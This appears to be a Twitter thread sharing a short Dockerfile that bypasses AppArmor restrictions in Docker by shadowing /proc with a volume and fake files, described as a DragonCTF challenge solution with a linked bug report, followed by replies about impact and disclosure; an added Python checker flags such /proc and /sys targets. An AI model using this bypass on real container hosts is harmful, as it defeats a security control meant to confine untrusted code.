@adam_iwaniuk
Docker apparmor bypass:
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions
CMD YOUR_CMD
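
A static check that a CI or registry gate could run over Dockerfiles to flag the pattern in the post above (a VOLUME, COPY or ADD target under /proc). It is an added example, not part of the original thread; the function names and the choice of /proc and /sys as reserved paths are assumptions.

```python
import json
import posixpath
import shlex

RESERVED = ("/proc", "/sys")  # assumption: runtime-owned mounts an image must not target

def _reserved(path, workdir):
    full = "/" + posixpath.normpath(posixpath.join(workdir, path)).lstrip("/")
    return any(full == r or full.startswith(r + "/") for r in RESERVED)

def _instructions(text):
    """Yield (first_line_number, instruction), joining backslash continuations."""
    buf, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        start = start or n
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield start, buf + line
        buf, start = "", 0

def _args(rest):  # accepts both the JSON-array and the whitespace form
    if rest.lstrip().startswith("["):
        try:
            return [str(a) for a in json.loads(rest)]
        except ValueError:
            pass
    return shlex.split(rest)

def find_reserved_targets(dockerfile_text):
    """Return (line, instruction, path) for VOLUME/COPY/ADD targets under RESERVED."""
    findings, workdir = [], "/"
    for lineno, instr in _instructions(dockerfile_text):
        op, rest = (instr.split(None, 1) + [""])[:2]
        op = op.upper()
        if op in ("FROM", "WORKDIR"):  # every build stage starts again at /
            workdir = "/" if op == "FROM" else posixpath.join(workdir, rest.strip())
        elif op in ("VOLUME", "COPY", "ADD"):
            args = [a for a in _args(rest) if not a.startswith("--")]
            targets = args if op == "VOLUME" else args[-1:]
            findings += [(lineno, op, t) for t in targets if _reserved(t, workdir)]
    return findings

# Constructed sample modelled on the Dockerfile in the post above.
SAMPLE = "FROM ubuntu:18.04\nVOLUME /proc\nCOPY empty /proc/self/status\nCOPY app /opt/app\n"
```

Paths built from ARG or ENV variables are not expanded here, so such a Dockerfile would need its values resolved before the check.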

Adam Iwaniuk
@adam_iwaniuk
22 Sep

It was the intended solution to one of the challenges in DragonCTF organized by @DragonSectorCTF this weekend. It was solved by one team, @allesctf congratulations!

leoluk@chaos.social
@leolukde
22 Sep

Our writeup/bug report for the AppArmor bypass: github.com/opencontainers… @allesctf

Bill Plein 🏴☠️
@billplein
23 Sep

I totally get the cool solution for the CTF but what practical application does the bug report solve?
The only one I can think of is where a private registry scanner requires Ubuntu and the image scan passes.
I can create a base image with any security holes I want.
(1/2)

Bill Plein 🏴☠️
@billplein
23 Sep

The same situation could be created with a malicious Ubuntu install on a VM. Or on bare metal with SAN Storage.
It is an Ubuntu problem. And requires insider access or running VMs or Container images blindly.

ytcracker 🎤💻🔬🗝🏴☠️🤙
@realytcracker
23 Sep

na zdorovie

Sune Keller
@sirlatrom
23 Sep

What about responsible disclosure?